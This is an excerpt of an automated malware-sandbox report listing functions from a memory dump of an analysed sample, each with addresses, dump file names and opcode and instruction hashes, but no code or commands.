                                • Opcode Fuzzy Hash: 27c15ce4a1c331bc52fe54e80a11c8f78838364ee69a8bbe2f5e17b3e25e5991
                                • Instruction Fuzzy Hash: 8401FB3091C41A8EEBA4BA14D899BFC73A0FB54341F9044B9D44ED32A2DE386A958B49
                                Function 00007FF848E86FA8 Relevance: .0, Instructions: 34COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cb65897aef3bebfaa9c3501a957d9e020c54da186a0abb5acc78b9748c16a7cf
                                • Instruction ID: baceb5edc2580d1ba02437bd803b3e7c2b8211487aef52575d200fede0ff0c28
                                • Opcode Fuzzy Hash: cb65897aef3bebfaa9c3501a957d9e020c54da186a0abb5acc78b9748c16a7cf
                                • Instruction Fuzzy Hash: B3F0302091C4098FEAA4FB14D4896BC33A1FF54381F5005B9D84ED32A2EE386E55865D
                                Function 00007FF848E8526D Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction ID: 1a8185910e699bc6214a87cccf390c313d3b6f4135211ebd64dfd0fe449ba78e
                                • Opcode Fuzzy Hash: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction Fuzzy Hash: 17E01A30E0D4068FF760FA98C0003BD22A5AF84380FA50079D92DE72C6CF3AAC419658
                                Function 00007FF848E80D30 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction ID: 52992cf1c16fdb706f6debe560519456def7e2a2e55aa8ebaf8fff9ec8b9ce2e
                                • Opcode Fuzzy Hash: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction Fuzzy Hash: 63E01734B0C20ADFE700FF54C4846AEB7A1FB91361F6082A5C40187299DB78A684CA84
                                Function 00007FF848E806A5 Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction ID: 773e045d4ae15082dc567967975dcfd9c5073a4b0737c160e12d86301ae84c87
                                • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction Fuzzy Hash: FDC04C06D5E91F09F455B16E54460ACA1407FD56D0FE50172D51C424D1DE7D20D6516E
                                Function 00007FF848E812D8 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: dcc0d68abf5b0b3c2ab49b597791ffbcf23c0c5793d40d8cd22d28b5fe74732b
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: F9C04C345558098FC948FB29D88591877A0FF19215BD601D0E409C7171E669DCD5D745
                                Function 00007FF848E835AD Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 733260b08102115755e8e57c07d6cf0cc5be73c30694b4cef9219d6e3ea0c8b4
                                • Instruction ID: 6185520e9fe11aed0849a51dc85740cb99ed426f25b61394d607bafc4486759e
                                • Opcode Fuzzy Hash: 733260b08102115755e8e57c07d6cf0cc5be73c30694b4cef9219d6e3ea0c8b4
                                • Instruction Fuzzy Hash: 20C08C06E0DC2A9AE25A221404202BE0442DF80795F986071E00E872CADE1C1A0106CA
                                Function 00007FF848E806C8 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 523bdebfd329f9494f4a36e86845b5334741e8ba2daeaf6a0f0b7ecea0633d04
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 19B01200C5E40F04E40431BA08420AC70407FC4180FC10070D40C41081D97D1095025A

                                Non-executed Functions

                                Function 00007FF848E809B0 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID: c9$!k9$"s9$#{9
                                • API String ID: 0-1692736845
                                • Opcode ID: 1faa08c920c1acac1da93e729ba170363ce50425dd1c15349f3f3d149fc2acff
                                • Instruction ID: 7dbab12ab344c891487e757cc4c1567e384ca26d8ebe423f1814e492fe212c8d
                                • Opcode Fuzzy Hash: 1faa08c920c1acac1da93e729ba170363ce50425dd1c15349f3f3d149fc2acff
                                • Instruction Fuzzy Hash: 98413ED6ACE86A7DE21D36BDB4111FD6B44EF812B5F4C93B7E04C891838E18608586FD